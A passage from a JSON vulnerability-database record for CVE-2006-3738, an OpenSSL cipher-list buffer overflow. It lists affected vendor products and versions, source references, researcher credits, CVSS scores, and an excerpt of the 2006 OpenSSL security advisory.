            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2.3"
          },
          {
            "model": "s8300 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "networks ip address domain manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "f...",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.3"
          },
          {
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.0"
          },
          {
            "model": "beta11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "grid engine 32-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "mds 9216i",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.3"
          },
          {
            "model": "hardware management console for pseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "s8710 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "hp-ux b.11.00",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "filezilla",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.28"
          },
          {
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.9"
          },
          {
            "model": "hardware management console for pseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "model": "computing snapgear sg710",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.3"
          },
          {
            "model": "call manager es62",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.1"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.132"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.10"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.2.1"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.10.2.65"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.4"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "sip proxy server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.5"
          },
          {
            "model": "openvms secure web server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.5.1"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.1.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.6.1"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "grid engine update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "s8500",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.2"
          },
          {
            "model": "project openssl beta3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.0.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.639"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "model": "openvpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.9"
          },
          {
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "model": "networks meridian option 11c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.4"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(2)"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "grid engine 64-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "s8500 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8710 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.1"
          },
          {
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4.2"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1700"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.7"
          },
          {
            "model": "grid engine update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "ons mspp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "5.4-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.30"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3.728"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3(1)"
          },
          {
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "model": "grid engine update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "home",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.3"
          },
          {
            "model": "ciscosecure acs for windows and unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "hardware management console for iseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "tru64 b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "stonebeat fullcluster for isa server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "call manager es55",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(0)"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0"
          },
          {
            "model": "css11500 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.5"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "8.0"
          },
          {
            "model": "server 0.9.4e",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "tru64 b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.657"
          },
          {
            "model": "secure enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "call manager es24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44910"
          },
          {
            "model": "s8300 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear u2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "secure",
            "version": "3.1.4"
          },
          {
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154542.3(5)"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.01"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "project openssl beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.5"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.3.2"
          },
          {
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "s8700 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear sg580",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons 15454e optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1-1"
          },
          {
            "model": "application control engine module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44920"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "model": "project openssl l",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.2"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "ons mstp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "networks wlan access point",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7250.0"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(2)"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The vendor credits Tavis Ormandy and Will Drewry of the Google Security Team with the discovery of this vulnerability.",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2006-3738",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2006-3738",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2006-3738",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#386964",
                "trust": 0.8,
                "value": "0.32"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#845620",
                "trust": 0.8,
                "value": "7.56"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#547300",
                "trust": 0.8,
                "value": "2.53"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. \nSuccessfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. OpenSSL Security Advisory [28th September 2006]\n\nNew OpenSSL releases are now available to correct four security\nissues. \n\n\nASN.1 Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940)\n==============================================================\n\nVulnerability\n-------------\n\nDr. Henson recently developed an ASN.1 test suite for NISCC\n(www.niscc.gov.uk). During the parsing of certain invalid ASN.1 structures an error\ncondition is mishandled.  This can result in an infinite loop which\nconsumes system memory (CVE-2006-2937).  (This issue did not affect\nOpenSSL versions prior to 0.9.7)\n\n2. Certain types of public key can take disproportionate amounts of\ntime to process. This could be used by an attacker in a denial of\nservice attack (CVE-2006-2940). \n\nAny code which uses OpenSSL to parse ASN.1 data from untrusted sources\nis affected. This includes SSL servers which enable client\nauthentication and S/MIME applications. \n\nAcknowledgements\n----------------\n\nThe OpenSSL team thank Dr S. Henson of Open Network Security and 